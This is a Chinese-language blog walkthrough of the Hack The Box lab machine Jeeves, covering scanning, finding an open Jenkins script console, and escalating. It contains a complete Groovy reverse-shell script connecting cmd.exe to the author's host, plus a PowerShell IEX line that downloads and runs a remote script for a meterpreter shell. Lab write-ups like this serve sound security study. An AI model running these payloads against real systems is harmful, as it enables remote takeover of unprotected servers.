

r0ckyzzz's Blog.

HTB靶机Jeeves通关笔记

r0ckyzzz's Blog.

HTB靶机Jeeves通关笔记

OSCP HTB

Word count: 363Reading time: 1 min

 2020/04/04   Share

• 
• 
• 
• 
• 

HTB靶机Jeeves通关笔记

IP地址:10.10.10.63
系统:windows

¶开始

nmap 扫描

不能打永恒之蓝
80端口不会POST数据 会直接跳转到error.html页面
然后那个页面是一张图片

目录扫描真的太慢了 我们地理位置不是很有优势
我直接看了wp
用dirbuster/directory-list-2.3-medium.txt这个字典扫描50000端口会扫出一个
/askjeeves这个目录

我用dirb的big.txt字典什么都没扫出来- -!

打开是个jenkins页面

这里关闭了权限认证所以可以直接访问后台

这里可以直接执行命令
println('whoami'.execute().getText())

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
找到一个groovy反弹shell 的脚本

String host="10.10.16.45";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

得到一个反弹shell

powershell 反弹shell的方法
https://www.anquanke.com/post/id/99793#h2-5

反弹一个meterpreter的shell 比较好操作

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.45:8000/1.ps1')

提权成功

找到了hm.txt 但不是flag

最后看了wirteup 结果是隐写

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/04/04/HTB%E9%9D%B6%E6%9C%BAJeeves%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0/

发表日期：April 4th 2020, 11:28:00 pm

更新日期：April 4th 2020, 11:30:19 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  利用captcha_trainer进行验证码识别
• Previous Post
  HTB靶机Shocker、Blue、Bank通关笔记

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. HTB靶机Jeeves通关笔记
   1. 1.1. ¶开始



• Archive
• Tag
• Cate

Total : 37

2021

• 08/02利用captcha_trainer进行验证码识别

2020

• 04/04HTB靶机Jeeves通关笔记
• 04/03HTB靶机Shocker、Blue、Bank通关笔记
• 04/02HTB靶机Lame、Leagcy、Bashed、Popcorn通关笔记
• 03/27Vulnhub靶机LiterallyVulnerable通关笔记
• 03/26Vulnhub靶机SickOS1.1通关笔记
• 03/25# Vulnhub靶机SkyTower通关笔记
• 03/24Vulnhub靶机VulnOS2通关笔记
• 03/24Vulnhub靶机pwnlab_init通关笔记
• 03/23Vulnhub靶机Stapler通关笔记
• 03/22Vulnhub靶机FristiLeaks_1.3通关笔记
• 03/21Vulnhub靶机DeRPnStiNK通关笔记
• 03/21Vulnhub靶机LordOfTheRoot_1.0.1通关笔记
• 03/20Vulnhub靶机W1r3s通关笔记
• 03/19Vulnhub靶机Tr0ll:1通关笔记
• 03/19Vulnhub靶机Wintermute通关笔记
• 03/18Vulnhub靶机Raven2通关笔记
• 03/17Vulnhub靶机Raven1通关笔记
• 03/17Vulnhub靶机Lampiao通关笔记
• 03/16Vulnhub靶机GoldenEye通关笔记
• 03/15Vulnhub靶机DC-9通关笔记
• 03/15Vulnhub靶机DC-8通关笔记
• 03/14Vulnhub靶机DC-7通关笔记
• 03/13Vulnhub靶机DC-6通关笔记
• 03/10Vulnhub靶机DC-5通关笔记
• 03/10Vulnhub靶机DC-4通关笔记
• 03/08Vulnhub靶机DC-3通关笔记
• 03/06Vulnhub靶机DC-2通关笔记
• 03/05Vulnhub靶机DC-1通关笔记
• 02/22局域网DNS劫持
• 02/22Wifi-pumpkin
• 02/22攻防世界Web进阶区部分writeup
• 02/22攻防世界Web进阶区部分writeup 2
• 02/22CISCN Web love_math
• 02/22CVE-2018-4878复现
• 02/22CISCN Web1 Justsoso
• 02/22免杀相关

Security security ctf vulnhub Vulnhub OSCP vulhub Linux环境变量 HTB htb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

